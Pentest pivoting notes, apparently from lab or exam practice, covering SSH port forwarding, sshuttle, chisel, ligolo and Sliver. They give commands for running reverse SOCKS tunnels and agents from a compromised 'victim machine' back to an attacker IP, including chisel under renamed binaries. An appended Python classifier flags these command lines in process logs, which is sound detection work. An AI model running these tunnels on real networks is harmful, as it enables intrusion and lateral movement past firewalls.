| Concept | Direction | Example |
|---|---|---|
| Port Forwarding | Local to Remote | ssh -L 8080:localhost:8080 user@remote_server_ip |
| Remote Port Forwarding | Remote to Local | ssh -R 3306:localhost:3306 user@remote_server_ip |
| Reverse Tunnel | Remote to Local | ssh -R 8080:localhost:8080 user@public_server_ip |
| Forward Tunnel | Local to Remote | ssh -L 3306:remote_database_ip:3306 user@remote_server_ip |

Sshuttle
command:
sshuttle -r username@192.168.1.100 192.168.2.0/24
sudo nmap --top-ports=20 -sT -Pn IP
Chisel
After obtaining the reverse shell
Transfer the file to the machine where you obtained the shell, choosing the build that matches that machine's OS.
On your machine as Server:
./chisel server -p 8000 --reverse
On the victim machine:
./chisel client 192.168.119.185:8001 R:socks
./loot client 10.10.15.149:8001 R:socks
On the attacker's machine:
Modify the file:
sudo nano /etc/proxychains4.conf
socks5 127.0.0.1 1080
Then, before running any command, prefix it with proxychains.
proxychains nmap -sT ip
On my local machine:
./chisel server -p 8002 --reverse
./chisel server -p 8004 --reverse
On 10.10.10.123:
./chiselj client 10.10.16.108:8002 R:1080:socks
On DC01:
.\chiselj.exe client 10.10.16.108:8004 R:1090:socks
Ping scan doesn't work
SSH Local Port Forwarding

ssh -N -L [bind_address:]port:host:hostport [username@address]
SSH Remote Port Forwarding
In this case, we have access to a non-root shell on a Linux client on the internal network. On this compromised machine, we discover that a MySQL server is running on TCP port 3306. Unlike the previous scenario, the firewall is blocking inbound TCP port 22 (SSH) connections, so we can’t SSH into this server from our Internet-connected Kali machine.

The ssh command syntax to create this tunnel will include the local IP and port, the remote IP and port, and -R to specify a remote forward:
command:
ssh -N -R [bind_address:]port:host:hostport [username@address]
SSH Dynamic Port Forwarding
SSH dynamic port forwarding allows us to set a local listening port and have it tunnel incoming traffic to any remote destination through the use of a proxy.
command:
ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>
sudo vim /etc/proxychains.conf
socks4 127.0.0.1 8080

All local ports are forwarded at once.
command2:
sudo proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110
Ligolo
Setting up ligolo proxy
sudo ip tuntap add user jay mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.9.20.0/24 dev ligolo (Don't forget to change this)
./proxy -selfcert -laddr 10.10.15.57:443
agent_windows.exe -connect 10.10.15.57:8443 --ignore-cert
Sliver
upload agent.exe
execute agent.exe -connect 192.168.45.195:9001 --ignore-cert
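
Detection-side view of the commands in these notes, as an added example that is not part of the original notes: a small classifier that flags tunnel and pivot command lines in process-creation telemetry by argument shape. The rule names, the `classify`/`triage` helpers and the sample records are assumptions made for illustration; the sample lines are constructed from the commands above plus two benign ones.

```python
import re

# Rules match argument shape, not the binary name: the notes above run chisel
# renamed as ./loot and ./chiselj, so a filename match alone would miss it.
HOSTPORT = r"[\w.\-]+:\d{1,5}"
RULES = [
    # reverse SOCKS client: "<bin> client <server:port> R:[port:]socks"
    ("chisel-reverse-socks", re.compile(rf"\bclient\s+{HOSTPORT}\s+R:(?:\d+:)?socks\b")),
    # server side accepting reverse tunnels (broad; pair with process context)
    ("chisel-server-reverse", re.compile(r"\bserver\b.*\s--reverse\b")),
    # ssh -L / -R take [bind_address:]port:host:hostport; -D takes [bind:]port
    ("ssh-local-forward", re.compile(r"\bssh\b.*\s-\w*L\s*\S+:\S+:\d+")),
    ("ssh-remote-forward", re.compile(r"\bssh\b.*\s-\w*R\s*\S+:\S+:\d+")),
    ("ssh-dynamic-socks", re.compile(r"\bssh\b.*\s-\w*D\s*(?:\S+:)?\d+")),
    ("sshuttle-route", re.compile(r"\bsshuttle\b.*\s-r\s+\S+@\S+\s+[\d.]+/\d+")),
    # ligolo-style agent: "-connect <proxy:port>" with certificate checks disabled
    ("ligolo-agent", re.compile(rf"\s--?connect\s+{HOSTPORT}\b.*--?ignore-cert\b")),
]

def classify(cmdline):
    """Return the name of every rule whose argument pattern occurs in cmdline."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def triage(lines):
    """Map each flagged command line to its rule hits; clean lines are dropped."""
    hits = {}
    for line in (raw.strip() for raw in lines):
        tags = classify(line)
        if tags:
            hits[line] = tags
    return hits

# Constructed process-creation records: commands from the notes above mixed
# with benign lines that must stay unflagged.
SAMPLE = [
    "./loot client 10.10.15.149:8001 R:socks",
    ".\\chiselj.exe client 10.10.16.108:8004 R:1090:socks",
    "./chisel server -p 8002 --reverse",
    "ssh -N -R 3306:localhost:3306 user@remote_server_ip",
    "ssh -N -D 127.0.0.1:8080 user@remote_server_ip",
    "sshuttle -r username@192.168.1.100 192.168.2.0/24",
    "agent_windows.exe -connect 10.10.15.57:8443 --ignore-cert",
    "ssh user@remote_server_ip ls -la /var/log",
    "rsync -a /srv/data backup@192.168.1.100:/backup",
]

if __name__ == "__main__":
    for cmd, tags in triage(SAMPLE).items():
        print(f"{', '.join(tags):22} {cmd}")
```

Command-line matching only sees what the process logger records, so pair it with network telemetry for long-lived outbound sessions from hosts that should not originate them.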